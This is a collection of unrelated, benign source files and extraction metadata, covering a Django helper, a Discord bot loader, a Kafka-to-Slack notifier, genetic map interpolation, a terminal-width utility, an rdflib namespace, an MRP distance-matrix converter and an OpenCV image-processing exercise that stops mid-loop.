"efdir.fs.mkdirs",
"efdir.fs.rfile"
] |
[((754, 780), 'os.path.exists', 'os.path.exists', (['parent_dir'], {}), '(parent_dir)\n', (768, 780), False, 'import os\n'), ((975, 995), 'os.path.dirname', 'os.path.dirname', (['dir'], {}), '(dir)\n', (990, 995), False, 'import os\n'), ((1011, 1032), 'os.path.basename', 'os.path.basename', (['dir'], {}), '(dir)\n', (1027, 1032), False, 'import os\n'), ((181, 206), 'os.path.splitext', 'os.path.splitext', (['cfgfile'], {}), '(cfgfile)\n', (197, 206), False, 'import os\n'), ((254, 271), 'efdir.fs.rfile', 'fs.rfile', (['cfgfile'], {}), '(cfgfile)\n', (262, 271), False, 'from efdir import fs\n'), ((287, 311), 'efdir.rstcfg.get_dirs', 'rstcfg.get_dirs', (['rst_str'], {}), '(rst_str)\n', (302, 311), False, 'from efdir import rstcfg\n'), ((542, 562), 'efdir.rstcfg.get_dirs', 'rstcfg.get_dirs', (['cfg'], {}), '(cfg)\n', (557, 562), False, 'from efdir import rstcfg\n'), ((794, 819), 'os.path.isdir', 'os.path.isdir', (['parent_dir'], {}), '(parent_dir)\n', (807, 819), False, 'import os\n'), ((930, 961), 'efdir.fs.mkdirs', 'fs.mkdirs', (['parent_dir'], {}), '(parent_dir, **kwargs)\n', (939, 961), False, 'from efdir import fs\n'), ((1093, 1141), 'os.path.join', 'os.path.join', (['parent_dir', 'dirname', 'basename[:-1]'], {}), '(parent_dir, dirname, basename[:-1])\n', (1105, 1141), False, 'import os\n'), ((1209, 1223), 'efdir.fs.touch', 'fs.touch', (['full'], {}), '(full)\n', (1217, 1223), False, 'from efdir import fs\n'), ((353, 370), 'efdir.fs.rjson', 'fs.rjson', (['cfgfile'], {}), '(cfgfile)\n', (361, 370), False, 'from efdir import fs\n'), ((386, 405), 'efdir.jsoncfg.get_dirs', 'jsoncfg.get_dirs', (['d'], {}), '(d)\n', (402, 405), False, 'from efdir import jsoncfg\n'), ((610, 631), 'efdir.jsoncfg.get_dirs', 'jsoncfg.get_dirs', (['cfg'], {}), '(cfg)\n', (626, 631), False, 'from efdir import jsoncfg\n'), ((1158, 1191), 'os.path.join', 'os.path.join', (['parent_dir', 'dirname'], {}), '(parent_dir, dirname)\n', (1170, 1191), False, 'import os\n'), ((1252, 1281), 'os.path.join', 'os.path.join', (['parent_dir', 'dir'], {}), '(parent_dir, dir)\n', (1264, 1281), False, 'import os\n')]
|
from typing import List
import numpy as np
Tensor = List[float]
def single_output(xdata: List[Tensor], ydata: List[Tensor]) -> List[Tensor]:
xdata = np.asarray(xdata)
ydata = np.asarray(ydata)
|
[
"numpy.asarray"
] |
[((155, 172), 'numpy.asarray', 'np.asarray', (['xdata'], {}), '(xdata)\n', (165, 172), True, 'import numpy as np\n'), ((185, 202), 'numpy.asarray', 'np.asarray', (['ydata'], {}), '(ydata)\n', (195, 202), True, 'import numpy as np\n')]
|
import pytz
from django.db import transaction
from django.utils import timezone
from messdiener.models import Mass, Type
@transaction.atomic
def delete_masses_without_type(plan_pk):
Mass.objects.filter(plan=plan_pk).filter(type__isnull=True).delete()
@transaction.atomic
def assign_types(plan_pk):
types = Type.objects.all()
masses = Mass.objects.filter(plan=plan_pk).all()
for mass in masses:
for type in types:
for rule in type.rules.all():
mass_local_time = convert_to_localtime(mass.time)
if int_to_day_of_week(mass.time.weekday()) == rule.dayOfWeek \
and mass_local_time.hour == rule.time.hour \
and mass_local_time.minute == rule.time.minute \
and mass.location_id == rule.location_id:
mass.type = rule.type
mass.save()
def int_to_day_of_week(day_int):
weekday_map = {
0: "mon",
1: "tue",
2: "wed",
3: "thu",
4: "fri",
5: "sat",
6: "sun",
}
return weekday_map[day_int]
def convert_to_localtime(utctime):
utc = utctime.replace(tzinfo=pytz.UTC)
localtz = utc.astimezone(timezone.get_current_timezone())
return localtz
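# A quick sanity check of int_to_day_of_week, assuming Python's Monday=0
# weekday() convention (2021-01-04 is a known Monday):
def _example_weekday():
    import datetime
    assert int_to_day_of_week(datetime.date(2021, 1, 4).weekday()) == "mon"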
|
[
"messdiener.models.Mass.objects.filter",
"django.utils.timezone.get_current_timezone",
"messdiener.models.Type.objects.all"
] |
[((319, 337), 'messdiener.models.Type.objects.all', 'Type.objects.all', ([], {}), '()\n', (335, 337), False, 'from messdiener.models import Mass, Type\n'), ((1229, 1260), 'django.utils.timezone.get_current_timezone', 'timezone.get_current_timezone', ([], {}), '()\n', (1258, 1260), False, 'from django.utils import timezone\n'), ((351, 384), 'messdiener.models.Mass.objects.filter', 'Mass.objects.filter', ([], {'plan': 'plan_pk'}), '(plan=plan_pk)\n', (370, 384), False, 'from messdiener.models import Mass, Type\n'), ((189, 222), 'messdiener.models.Mass.objects.filter', 'Mass.objects.filter', ([], {'plan': 'plan_pk'}), '(plan=plan_pk)\n', (208, 222), False, 'from messdiener.models import Mass, Type\n')]
|
import json
import os
from discord.ext import commands
with open(os.getcwd() + '/resources/Setting.json', mode='r',
encoding='utf8') as Setting_Json:
Setting_Json_data = json.load(Setting_Json)
pybot = commands.Bot(command_prefix='r?')
@pybot.event
async def on_ready():
print("debug code 0")
    for filename in os.listdir(os.getcwd() + '/Commands'):
        if not filename.endswith('.py'):
            continue
        print('Commands.'+filename[:-3])
        pybot.load_extension('Commands.'+filename[:-3])
if __name__ == '__main__':
pybot.run(Setting_Json_data['token'])
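# A sketch of the extension layout the loader above expects: every
# Commands/<name>.py needs a setup() entry point (discord.py 1.x style);
# the Ping cog below is a hypothetical example, not part of this bot.
#
#     from discord.ext import commands
#     class Ping(commands.Cog):
#         @commands.command()
#         async def ping(self, ctx):
#             await ctx.send("pong")
#     def setup(bot):
#         bot.add_cog(Ping(bot))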
|
[
"os.getcwd",
"json.load",
"discord.ext.commands.Bot"
] |
[((218, 251), 'discord.ext.commands.Bot', 'commands.Bot', ([], {'command_prefix': '"""r?"""'}), "(command_prefix='r?')\n", (230, 251), False, 'from discord.ext import commands\n'), ((185, 208), 'json.load', 'json.load', (['Setting_Json'], {}), '(Setting_Json)\n', (194, 208), False, 'import json\n'), ((343, 354), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (352, 354), False, 'import os\n'), ((66, 77), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (75, 77), False, 'import os\n')]
|
import json
import os
import time
from confluent_kafka import Consumer, KafkaError
from slack import WebClient
from slack.errors import SlackApiError
# Bot User OAuth Access Token
# Scope = chat:write
token = os.environ["SLACK_BOT_TOKEN"]
sc = WebClient(token)
# Set 'auto.offset.reset': 'smallest' if you want to consume all messages
# from the beginning of the topic
settings = {
"bootstrap.servers": "localhost:9092",
"group.id": "kafka-notify",
"default.topic.config": {"auto.offset.reset": "largest"},
}
c = Consumer(settings)
# Topic = "SLACK-KAFKA"
c.subscribe(["SLACK-KAFKA"])
# TODO: Make bolts with Apache Storm
try:
while True:
msg = c.poll(0.1) # read data
time.sleep(5)
if msg is None:
continue
elif not msg.error():
print("Received message: {0}".format(msg.value()))
if msg.value() is None:
continue
try:
app_msg = json.loads(msg.value().decode())
            except (AttributeError, UnicodeDecodeError):  # value may already be a str
app_msg = json.loads(msg.value())
try:
user = app_msg["USER"]
message = app_msg["TEXT"]
channel = "kafka"
text = (
"`%s` found a bug :\n> %s\n\n_Please see if we can fix the issue *right here, right now*_"
% (user, message)
)
print('\nSending message "%s" to channel %s' % (text, channel))
            except KeyError as e:
                # the payload dict may lack USER/TEXT; fall back to a raw dump
                print("Failed to get channel/text from message.")
                print("missing key: %s" % e)
                channel = "general"
                text = msg.value()
try:
sc_response = sc.chat_postMessage(channel=channel, text=text,)
except SlackApiError as e:
assert e.response["ok"] is False
print("\t** FAILED: %s" % e.response["error"])
elif msg.error().code() == KafkaError._PARTITION_EOF:
print(
"End of partition reached {0}/{1}".format(msg.topic(), msg.partition())
)
else:
print("Error occured: {0}".format(msg.error().str()))
except Exception as e:
print(type(e))
print(dir(e))
finally:
c.close()
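# A sketch of how to feed the consumer above a test message from a separate
# process, assuming a broker on localhost:9092:
#
#     from confluent_kafka import Producer
#     p = Producer({"bootstrap.servers": "localhost:9092"})
#     p.produce("SLACK-KAFKA", json.dumps({"USER": "alice", "TEXT": "it broke"}))
#     p.flush()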
|
[
"slack.WebClient",
"confluent_kafka.Consumer",
"time.sleep"
] |
[((248, 264), 'slack.WebClient', 'WebClient', (['token'], {}), '(token)\n', (257, 264), False, 'from slack import WebClient\n'), ((530, 548), 'confluent_kafka.Consumer', 'Consumer', (['settings'], {}), '(settings)\n', (538, 548), False, 'from confluent_kafka import Consumer, KafkaError\n'), ((709, 722), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (719, 722), False, 'import time\n')]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Aug 17 14:53:05 2017
@author: manu
Step 1 : Modify the 1KGP OMNI maps to have same physical positions(bp) by interpolation
"""
import pandas as pd
import os
from scipy.interpolate import interp1d
import numpy as np
omni="../OMNI/" #Relative path to the 1KGP OMNI maps
omni_new="../OMNI_INTERPOLATED/" #Relative path for creating the interpolated maps
positions={}
maps={}
for pop in os.listdir(omni):
maps[pop]={}
print("Reading",pop)
for chrom in os.listdir(omni+pop):
tmap=pd.read_table(omni+pop+"/"+chrom, header=0,names=["pos","rate","map","filter"]) #Reading maps into dataframes
tmap=tmap[tmap["filter"]==0] #Removing filtered positions
maps[pop][chrom]=tmap
if not chrom in positions.keys():
positions[chrom]=[]
positions[chrom]=list(set(positions[chrom]+list(tmap["pos"]))) #Creating a union set of positions from all the maps
for chrom in positions.keys():
positions[chrom]=sorted(positions[chrom]) #Sorting the chromosome-wise markers by genomic locations
#%%
if not os.path.exists(omni_new):
os.makedirs(omni_new) #creating directories
#%%
for pop in os.listdir(omni):
print("Computing interpolated map:",pop)
if not os.path.exists(omni_new+pop):
os.makedirs(omni_new+pop)
for chrom in os.listdir(omni+pop):
tmap=maps[pop][chrom]
fmap=interp1d(tmap["pos"],tmap["map"]) #interpolating function
nmap=pd.DataFrame(columns=["chr","pos"])
nmap["pos"]=positions[chrom]
nmap["chr"]=chrom[:-4]
nmap=pd.merge(nmap,tmap[["pos","map"]],how="left",on="pos") #copying map values where positions are equal
nmap.loc[(nmap["map"].isnull()) & (nmap["pos"]<tmap["pos"].iloc[0]),"map"]=0 #setting map units as 0 for positions preceeding the map
nmap.loc[(nmap["map"].isnull()) & (nmap["pos"]>tmap["pos"].iloc[-1]),"map"]=tmap["map"].iloc[-1] #setting map units as the highest map unit for positions exceeding the map
nmap.loc[(nmap["map"].isnull()),"map"]=fmap(nmap.loc[(nmap["map"].isnull()),"pos"]) #interpolating for the rest
nmap["rate"]=list(np.diff(nmap["map"])/(np.diff(nmap["pos"])/1e6))+[0] #calculating rate for all the intervals
nmap=nmap.round(6)
nmap.to_csv(omni_new+pop+"/"+chrom, sep="\t", index=False,columns=["chr","pos","rate","map"]) #writing the interpolated map
print("Done!")
|
[
"pandas.DataFrame",
"os.makedirs",
"pandas.merge",
"os.path.exists",
"numpy.diff",
"pandas.read_table",
"scipy.interpolate.interp1d",
"os.listdir"
] |
[((474, 490), 'os.listdir', 'os.listdir', (['omni'], {}), '(omni)\n', (484, 490), False, 'import os\n'), ((1431, 1447), 'os.listdir', 'os.listdir', (['omni'], {}), '(omni)\n', (1441, 1447), False, 'import os\n'), ((551, 573), 'os.listdir', 'os.listdir', (['(omni + pop)'], {}), '(omni + pop)\n', (561, 573), False, 'import os\n'), ((1273, 1297), 'os.path.exists', 'os.path.exists', (['omni_new'], {}), '(omni_new)\n', (1287, 1297), False, 'import os\n'), ((1311, 1332), 'os.makedirs', 'os.makedirs', (['omni_new'], {}), '(omni_new)\n', (1322, 1332), False, 'import os\n'), ((1590, 1612), 'os.listdir', 'os.listdir', (['(omni + pop)'], {}), '(omni + pop)\n', (1600, 1612), False, 'import os\n'), ((586, 679), 'pandas.read_table', 'pd.read_table', (["(omni + pop + '/' + chrom)"], {'header': '(0)', 'names': "['pos', 'rate', 'map', 'filter']"}), "(omni + pop + '/' + chrom, header=0, names=['pos', 'rate',\n 'map', 'filter'])\n", (599, 679), True, 'import pandas as pd\n'), ((1505, 1535), 'os.path.exists', 'os.path.exists', (['(omni_new + pop)'], {}), '(omni_new + pop)\n', (1519, 1535), False, 'import os\n'), ((1547, 1574), 'os.makedirs', 'os.makedirs', (['(omni_new + pop)'], {}), '(omni_new + pop)\n', (1558, 1574), False, 'import os\n'), ((1655, 1689), 'scipy.interpolate.interp1d', 'interp1d', (["tmap['pos']", "tmap['map']"], {}), "(tmap['pos'], tmap['map'])\n", (1663, 1689), False, 'from scipy.interpolate import interp1d\n'), ((1774, 1810), 'pandas.DataFrame', 'pd.DataFrame', ([], {'columns': "['chr', 'pos']"}), "(columns=['chr', 'pos'])\n", (1786, 1810), True, 'import pandas as pd\n'), ((1891, 1949), 'pandas.merge', 'pd.merge', (['nmap', "tmap[['pos', 'map']]"], {'how': '"""left"""', 'on': '"""pos"""'}), "(nmap, tmap[['pos', 'map']], how='left', on='pos')\n", (1899, 1949), True, 'import pandas as pd\n'), ((2509, 2529), 'numpy.diff', 'np.diff', (["nmap['map']"], {}), "(nmap['map'])\n", (2516, 2529), True, 'import numpy as np\n'), ((2531, 2551), 'numpy.diff', 'np.diff', (["nmap['pos']"], {}), "(nmap['pos'])\n", (2538, 2551), True, 'import numpy as np\n')]
|
"""
Terminal info.
"""
import platform
import struct
# pylint: disable=invalid-name
try:
if platform.system() == 'Windows': # pragma: no cover (windows)
from ctypes import windll, create_string_buffer
fcntl, termios = None, None
else:
import fcntl
import termios
windll, create_string_buffer = None, None
except ImportError:
fcntl, termios = None, None
windll, create_string_buffer = None, None
DEFAULT_LINE_WIDTH = 78
MAX_LINE_WIDTH = 120
def term_width():
"""
Return the column width of the terminal, or ``None`` if it can't be
determined.
"""
if fcntl and termios:
try:
winsize = fcntl.ioctl(0, termios.TIOCGWINSZ, ' ')
_, width = struct.unpack('hh', winsize)
return width
except IOError:
pass
elif windll and create_string_buffer: # pragma: no cover (windows)
stderr_handle, struct_size = -12, 22
handle = windll.kernel32.GetStdHandle(stderr_handle)
csbi = create_string_buffer(struct_size)
res = windll.kernel32.GetConsoleScreenBufferInfo(handle, csbi)
if res:
(_, _, _, _, _, left, _, right, _,
_, _) = struct.unpack('hhhhHhhhhhh', csbi.raw)
return right - left + 1
else:
return 0 # console screen buffer not available
def line_width(default_width=DEFAULT_LINE_WIDTH, max_width=MAX_LINE_WIDTH):
"""
Return the ideal column width for the output from :func:`see.see`, taking
the terminal width into account to avoid wrapping.
"""
width = term_width()
if width: # pragma: no cover (no terminal info in Travis CI)
return min(width, max_width)
else:
return default_width
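# A minimal usage sketch: running this module directly prints the width that
# output would be wrapped to (assumes a normal interactive terminal).
if __name__ == '__main__':
    print('line width:', line_width())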
|
[
"fcntl.ioctl",
"struct.unpack",
"ctypes.windll.kernel32.GetStdHandle",
"ctypes.create_string_buffer",
"ctypes.windll.kernel32.GetConsoleScreenBufferInfo",
"platform.system"
] |
[((99, 116), 'platform.system', 'platform.system', ([], {}), '()\n', (114, 116), False, 'import platform\n'), ((687, 729), 'fcntl.ioctl', 'fcntl.ioctl', (['(0)', 'termios.TIOCGWINSZ', '""" """'], {}), "(0, termios.TIOCGWINSZ, ' ')\n", (698, 729), False, 'import fcntl\n'), ((753, 781), 'struct.unpack', 'struct.unpack', (['"""hh"""', 'winsize'], {}), "('hh', winsize)\n", (766, 781), False, 'import struct\n'), ((982, 1025), 'ctypes.windll.kernel32.GetStdHandle', 'windll.kernel32.GetStdHandle', (['stderr_handle'], {}), '(stderr_handle)\n', (1010, 1025), False, 'from ctypes import windll, create_string_buffer\n'), ((1041, 1074), 'ctypes.create_string_buffer', 'create_string_buffer', (['struct_size'], {}), '(struct_size)\n', (1061, 1074), False, 'from ctypes import windll, create_string_buffer\n'), ((1089, 1145), 'ctypes.windll.kernel32.GetConsoleScreenBufferInfo', 'windll.kernel32.GetConsoleScreenBufferInfo', (['handle', 'csbi'], {}), '(handle, csbi)\n', (1131, 1145), False, 'from ctypes import windll, create_string_buffer\n'), ((1230, 1268), 'struct.unpack', 'struct.unpack', (['"""hhhhHhhhhhh"""', 'csbi.raw'], {}), "('hhhhHhhhhhh', csbi.raw)\n", (1243, 1268), False, 'import struct\n')]
|
from rdflib import URIRef, Namespace
from definednamespace import DefinedNamespace
class RDFMOD(DefinedNamespace):
# http://www.w3.org/1999/02/22-rdf-syntax-ns#Property
comment: URIRef # A description of the subject resource.
domain: URIRef # A domain of the subject property.
    isDefinedBy: URIRef  # The definition of the subject resource.
label: URIRef # A human-readable name for the subject.
member: URIRef # A member of the subject resource.
range: URIRef # A range of the subject property.
seeAlso: URIRef # Further information about the subject resource.
subClassOf: URIRef # The subject is a subclass of a class.
subPropertyOf: URIRef # The subject is a subproperty of a property.
# http://www.w3.org/2000/01/rdf-schema#Class
Class: URIRef # The class of classes.
Container: URIRef # The class of RDF containers.
ContainerMembershipProperty: URIRef # The class of container membership properties, rdf:_1, rdf:_2, ..., all of which are sub-properties of 'member'.
Datatype: URIRef # The class of RDF datatypes.
Literal: URIRef # The class of literal values, eg. textual strings and integers.
Resource: URIRef # The class resource, everything.
# Valid non-python identifiers
_extras = ['12345', 'class']
_NS = Namespace("http://www.w3.org/2000/01/rdf-schema#")
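# A usage sketch, assuming this DefinedNamespace resolves attribute and item
# access against _NS the way rdflib's own DefinedNamespace does:
#     RDFMOD.label      # -> URIRef('http://www.w3.org/2000/01/rdf-schema#label')
#     RDFMOD['class']   # entries listed in _extras are reachable via item access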
|
[
"rdflib.Namespace"
] |
[((1483, 1533), 'rdflib.Namespace', 'Namespace', (['"""http://www.w3.org/2000/01/rdf-schema#"""'], {}), "('http://www.w3.org/2000/01/rdf-schema#')\n", (1492, 1533), False, 'from rdflib import URIRef, Namespace\n')]
|
#!/usr/bin/env python
'''
Author: <NAME>
Date: 23/11/2016
Script to convert pipeline output in MRP matrix format to distance matrix format.
Produces distance matrix file for every tree block in input,
and also a log file for every input file.
Run by using "make sdmdata" command.
Pipeline MRP input:
Tb_ID NCBI_ID charstring (0/1/2)
Distance matrix output:
File for every treeblock:
taxon_count char_count
taxa1 distance distance
taxa2 distance distance
Usage:
-i Input file (Input file (*.dat file from pipeline, containing MRP matrix/matrices))
-o Output directory (for *.sdm files with distance matrices and *.log file)
'''
import argparse
import itertools
import os
import sys
import logging
logging.basicConfig(format='%(levelname)s:%(message)s', level=logging.DEBUG)
def proc_log(logmessage, logtype, log_file):
if logtype == "inf":
logging.info(logmessage)
log_file.write("INFO: " + logmessage + "\n")
if logtype == "war":
logging.warning(logmessage)
log_file.write("WARNING: " + logmessage + "\n")
def get_tb_tree_dict(treeblock_file):
'''
Input:
Tb_ID NCBI_ID charstring
Output:
dict: key = Tb_ID, value = (dict: key = NCBI_ID, value = charstring)
'''
try:
treeblock_data = dict()
for l in treeblock_file:
l = l.strip().split()
tb_id = l[0]
ncbi_id = l[1]
charstr = l[2]
            if tb_id not in treeblock_data:
                treeblock_data[tb_id] = dict()
            treeblock_data[tb_id][ncbi_id] = charstr
treeblock_file.close()
return(treeblock_data)
except IndexError:
return None
def get_dist_dict(tb_tax_chars):
'''
Input:
dict: key = Tb_ID, value = (dict: key = NCBI_ID, value = charstring),
Output:
dict: key = tuple(taxa_combo), value = Hamming_dist / taxon_count / character_count
'''
try:
distdict = dict()
taxa = sorted(tb_tax_chars.keys())
tax_count = len(taxa)
for combotuple in itertools.product(taxa, repeat=2):
tax1 = combotuple[0]
tax2 = combotuple[1]
charst1 = tb_tax_chars[tax1]
charst2 = tb_tax_chars[tax2]
char_count = len(charst1)
            # count the positions whose characters differ (Hamming distance)
dist = len([i for i in range(char_count) if charst1[i] != charst2[i]])
distdict[combotuple] = dist / tax_count / char_count
return(distdict)
except MemoryError:
return None
def write_dist_matrix(distdict, char_count, taxa, distance_file):
    '''
    Input:
        dict: key = taxa_combo_tuple, value = Hamming_dist / taxon_count / char_count,
        char_count,
        (sorted_)taxa_list
    Output:
        File for every tree block:
            taxon_count char_count
            distance_matrix (normalized Hamming distances, one row per taxon)
    '''
tax_count = len(taxa)
combo_count = tax_count*tax_count
sorted_distdict = sorted(distdict)
print("\n# {}".format(os.path.basename(distance_file.name)), file=distance_file)
print("\n{} {}".format(tax_count, char_count), file=distance_file)
for t in taxa:
# start matrix row with taxon NCBI_ID
row = [t]
row_count = 0
for taxtuple in sorted_distdict:
# get the right combination of taxa in the right order
if t == taxtuple[0]:
dist = round(distdict[taxtuple], 8)
dist = "{:.8f}".format(dist)
row.append(dist)
else:
row_count += 1
if row_count == combo_count:
break
print(*row, file=distance_file)
def main():
parser = argparse.ArgumentParser(description='Process commandline arguments')
parser.add_argument("-i", type=str,
help="Input file (*.dat file from pipeline, containing MRP matrix/matrices)")
parser.add_argument("-o", type=str,
help="Output directory (for *.sdm files with distance matrices and *.log file)")
args = parser.parse_args()
outname_log = args.o + args.i
outname_log = outname_log.replace(".dat", ".log")
log_file = open(outname_log, "a")
treeblock_file = open(args.i)
proc_log("going to read MRP data from " + args.i, "inf", log_file)
treeblock_data = get_tb_tree_dict(treeblock_file)
if treeblock_data:
for tb in treeblock_data:
WORKdict = treeblock_data[tb]
taxa = sorted(WORKdict.keys())
if len(taxa) > 1:
WORKdict = get_dist_dict(WORKdict)
if WORKdict:
outname_tb = args.o + args.i + "." + tb + ".sdm"
distance_file = open(outname_tb, "w")
proc_log("going to write SDM data to " + outname_tb, "inf", log_file)
char_count = len(treeblock_data[tb][taxa[0]])
write_dist_matrix(WORKdict, char_count, taxa, distance_file)
distance_file.close()
proc_log("done writing " + outname_tb, "inf", log_file)
else:
proc_log("could not calculate distances", "war", log_file)
else:
proc_log("not enough taxa to work with", "war", log_file)
else:
proc_log("invalid MRP format", "war", log_file)
proc_log("done reading " + args.i, "inf", log_file)
log_file.close()
if __name__ == "__main__":
main()
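# A worked example of the distance defined in get_dist_dict (toy charstrings,
# not pipeline data): "001" and "011" differ at 1 of 3 characters, so with
# tax_count=2 the stored value is 1 / 2 / 3 ~= 0.1667:
#     get_dist_dict({"t1": "001", "t2": "011"})[("t1", "t2")]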
|
[
"argparse.ArgumentParser",
"logging.basicConfig",
"os.path.basename",
"logging.warning",
"logging.info",
"itertools.product"
] |
[((752, 828), 'logging.basicConfig', 'logging.basicConfig', ([], {'format': '"""%(levelname)s:%(message)s"""', 'level': 'logging.DEBUG'}), "(format='%(levelname)s:%(message)s', level=logging.DEBUG)\n", (771, 828), False, 'import logging\n'), ((3535, 3603), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Process commandline arguments"""'}), "(description='Process commandline arguments')\n", (3558, 3603), False, 'import argparse\n'), ((903, 927), 'logging.info', 'logging.info', (['logmessage'], {}), '(logmessage)\n', (915, 927), False, 'import logging\n'), ((1002, 1029), 'logging.warning', 'logging.warning', (['logmessage'], {}), '(logmessage)\n', (1017, 1029), False, 'import logging\n'), ((2004, 2037), 'itertools.product', 'itertools.product', (['taxa'], {'repeat': '(2)'}), '(taxa, repeat=2)\n', (2021, 2037), False, 'import itertools\n'), ((2962, 2998), 'os.path.basename', 'os.path.basename', (['distance_file.name'], {}), '(distance_file.name)\n', (2978, 2998), False, 'import os\n')]
|
import cv2 as cv
import numpy as np
from matplotlib import pyplot as plt
import random
import time
import sys
def display_image(window_name, img):
"""
Displays image with given window name.
:param window_name: name of the window
:param img: image object to display
"""
cv.imshow(window_name, img)
cv.waitKey(0)
cv.destroyAllWindows()
def my_integral(img):
# insert a border of 1 pixel
img_integ = cv.copyMakeBorder(
img, 1, 1, 1, 1, cv.BORDER_CONSTANT, value=0).astype(np.uint64)
# computation of the integral image
for i in range(img.shape[0] + 1):
for j in range(img.shape[1] + 1):
img_integ[i, j] = (
(img_integ[i, j] + img_integ[i - 1, j]
+ img_integ[i, j - 1] - img_integ[i-1, j-1]))
# remove border of 1 pixel
# at the bottom and right
return img_integ[:-1, :-1]
def mean_4_image(img_mean, yx, w_shape):
# decrease of one the dimension of the window
w_shape = (w_shape[0] - 1, w_shape[1] - 1)
    total = 0  # avoid shadowing the built-in sum()
    for y in range(yx[0], yx[0] + w_shape[0]):
        for x in range(yx[1], yx[1] + w_shape[1]):
            total += img_mean[y, x]
    mean = int(total) // np.size(img_mean)
return mean
def mean_4_integral(img_mean, yx, w_shape):
# decrease of one the dimension of the window
w_shape = (w_shape[0] - 1, w_shape[1] - 1)
a = img_mean[yx[0] + w_shape[0], yx[1] + w_shape[1]]
b = img_mean[yx[0], yx[1] + w_shape[0]]
c = img_mean[yx[0] + w_shape[0], yx[1]]
d = img_mean[yx[0], yx[1]]
    total = (a - b - c + d)  # avoid shadowing the built-in sum()
    mean = total / np.size(img_mean)
return mean.astype(np.uint8)
def calc_mean_exec_time(img, func_mean, YX, func_integral=None):
start_time = time.time()
means = []
# if func_integral is None, img_mean is euqual to img
# this because the mean gray value is computed by
# summing up each pixel and not using the integral func
img_mean = func_integral(img) if func_integral else img
for yx in YX:
means.append(func_mean(img_mean, yx, (square_l, square_l)))
print("- run-time: %ss" % (time.time() - start_time))
# we are not outputting the mean gray values because
# it is not required
# print(means)
def max_pwise_error(img1, img2):
# computation of the absolute pixel wise difference
errors = abs(img1.astype(np.int16) -
img2.astype(np.int16))
return errors.max()
def gaussian_blur(img, k_size, sigma):
    if k_size == (0, 0):
        # get the kernel size extracted by the formula
        # at the link https://bit.ly/33xESq3
        k = int((sigma - 0.35) / 0.15)
        k_size = (k, k)  # keep a 2-tuple so the indexing below works
# computing the kernel
kernel = np.zeros(k_size)
for y in range(k_size[0]):
for x in range(k_size[1]):
a = (x - (k_size[1]-1)/2)**2
b = (y - (k_size[0]-1)/2)**2
num = -1 * (a + b)
kernel[y, x] = np.exp(num/(2*sigma**2))
# normalization
kernel /= np.sum(kernel)
return cv.filter2D(img, -1, kernel)
def gaussian_blur_w_sep(img, k_size, sigma):
    if k_size == (0, 0):
        # get the kernel size extracted by the formula
        # at the link https://bit.ly/33xESq3
        k = int((sigma - 0.35) / 0.15)
        k_size = (k, k)  # keep a 2-tuple so the indexing below works
# computing the kernel Y
kernelY = np.zeros((k_size[0], 1))
for y in range(k_size[0]):
num = -1 * ((y - (k_size[0]-1)/2)**2)
kernelY[y, 0] = np.exp(num/(2*sigma**2))
# computing the kernel X
kernelX = np.zeros(k_size[1])
for x in range(k_size[1]):
num = -1 * ((x - (k_size[1]-1)/2)**2)
kernelX[x] = np.exp(num/(2*sigma**2))
# normalization
kernelY /= np.sum(kernelY[:, 0])
kernelX /= np.sum(kernelX)
# obtaining the final kernel
kernel = kernelY * kernelX
return cv.filter2D(img, -1, kernel)
def salt_n_pepper(img):
img_sp_gaus = img.copy()
# creation of the salt n pepper noise
for y in range(img_sp_gaus.shape[0]):
for x in range(img_sp_gaus.shape[1]):
            # modify the pixel only ~30% of the time
if random.uniform(0, 1) <= 0.30:
# assign randomly 255 or 0
img_sp_gaus[y, x] = 255 if random.randint(0, 2) else 0
return img_sp_gaus
def distance_mean_gray_val(img1, img2):
mean1 = (np.sum(img1.astype(np.int16)) /
np.size(img1))
mean2 = (np.sum(img2.astype(np.int16)) /
np.size(img2))
return abs(mean1 - mean2)
def filter_SVD(img, kernel):
img_svd = img.copy()
w, u, vt = cv.SVDecomp(kernel)
# getting the highest singular value
i_value = np.argmax(w)
vt = vt[i_value, :].reshape((1, 3))
u = u[:, i_value].reshape((3, 1)) * w[i_value, 0:1]
# filtering the image w/ the obtained kernel
img_svd = cv.sepFilter2D(img_svd, -1, vt, u)
return img_svd
if __name__ == '__main__':
np.seterr(over='ignore')
img_path = sys.argv[1]
# =========================================================================
# ==================== Task 1 =================================
# =========================================================================
print('\nTask 1:')
img = cv.imread(img_path, cv.IMREAD_GRAYSCALE)
# ++++++++++++++++++++++++++++++
# a
# ++++
    # our own equivalent of the function cv.integral
img_integ = my_integral(img)
# normalization of the integral
img_integ = ((img_integ - img_integ.min()) /
(img_integ.max() - img_integ.min()) * 255).astype(np.uint8)
display_image('Task 1 - a', img_integ)
# ++++++++++++++++++++++++++++++
# b
# ++++
# Compute the mean grey value
img_integ2 = cv.integral(img)
img_integ3 = my_integral(img)
# summing up each pixel value in the image
mean1 = mean_4_image(img, (0, 0), img.shape)
# computing an integral image using the function cv.integral
mean2 = mean_4_integral(img_integ2, (0, 0), img_integ2.shape)
# computing an integral image with your own function
mean3 = mean_4_integral(img_integ3, (0, 0), img_integ3.shape)
print('Mean grey value of the image (i): ', mean1)
print('Mean grey value of the image (ii): ', mean2)
print('Mean grey value of the image (iii): ', mean3)
# ++++++++++++++++++++++++++++++
# c
# ++++
square_l = 100
# getting the 10 random points
YX = [(random.randint(0, img_integ2.shape[0]-square_l),
random.randint(0, img_integ2.shape[1]-square_l))
for _ in range(10)]
print('Mean gray value w/ 10 random squares (i)', end=' ')
calc_mean_exec_time(img, mean_4_image, YX)
print('Mean gray value w/ 10 random squares (ii)', end=' ')
calc_mean_exec_time(img, mean_4_integral, YX, cv.integral)
print('Mean gray value w/ 10 random squares (iii)', end=' ')
calc_mean_exec_time(img, mean_4_integral, YX, my_integral)
# =========================================================================
# ==================== Task 2 =================================
# =========================================================================
print('\nTask 2:')
img_eqz = cv.equalizeHist(img)
display_image('Equalization', img_eqz)
img_my_eqz = img.copy()
histogram = np.zeros(256)
# histogram creation
for i in range(256):
histogram[i] = np.count_nonzero(img_my_eqz == i)
# Creation of the cumulative distribution function CDF
cdf = np.array([np.sum(histogram[:(i+1)]) for i in range(256)])
# normalization
nr = np.round(((cdf - cdf.min()) / (cdf.max() - cdf.min())) * 255)
for y in range(img.shape[0]):
for x in range(img.shape[1]):
img_my_eqz[y, x] = nr[img[y, x]]
